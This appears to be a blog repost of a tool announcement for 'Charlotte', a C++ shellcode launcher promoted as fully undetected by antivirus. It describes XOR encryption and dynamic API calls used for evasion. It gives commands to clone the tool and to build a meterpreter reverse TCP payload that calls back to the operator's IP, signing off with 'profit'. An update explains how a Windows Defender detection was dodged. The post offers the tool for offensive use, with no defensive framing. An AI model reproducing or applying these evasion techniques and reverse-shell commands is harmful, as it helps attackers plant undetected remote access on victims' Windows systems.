Charlotte : C++ Fully Undetected Shellcode Launcher

Charlotte is an c++ fully undetected shellcode launcher .

Description

  • 13/05/2021:
    • c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
    • dynamic invoking of win32 api functions
    • XOR encryption of shellcode and function names
    • randomised XOR keys and variables per run
    • on Kali Linux, simply ‘apt-get install mingw-w64*’ and thats it!
  • 17/05/2021:
    • random strings length and XOR keys length

Antiscan.me

Usage

git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py

Example:

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py
profit

tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload

Update v1.1

17/05/21:

Apparently Microsoft Windows Defender was able to detect the .DLL binary, and how did they flag it? by looking for several XOR keys of 16 byte size changing it to 9 shown in the POC .gif below shows it is now undetected again cheers.

R K

Recent Posts

How To Use Variables In Bash Scripts

Introduction Variables are one of the most important basics of Bash scripting. A variable is…

15 hours ago

How To Run A Bash Script In Linux Step By Step

Introduction Running a Bash script in Linux is a basic but important skill for anyone…

15 hours ago

How To Write Your First Bash Script In Linux Step By Step

Introduction Writing your first Bash script in Linux is one of the best ways to…

15 hours ago

Install Docker on Ubuntu 24.04 With Easy Setup Guide

Docker has become one of the most important tools in modern software development. If you…

16 hours ago

APT Command Linux: Essential Package Management Guide

The APT Command Linux users rely on is one of the most powerful tools for…

19 hours ago

Install RPM on Ubuntu: Easy Guide to Run RPM Packages

Ubuntu users usually install software through .deb packages or the APT package manager. However, some…

22 hours ago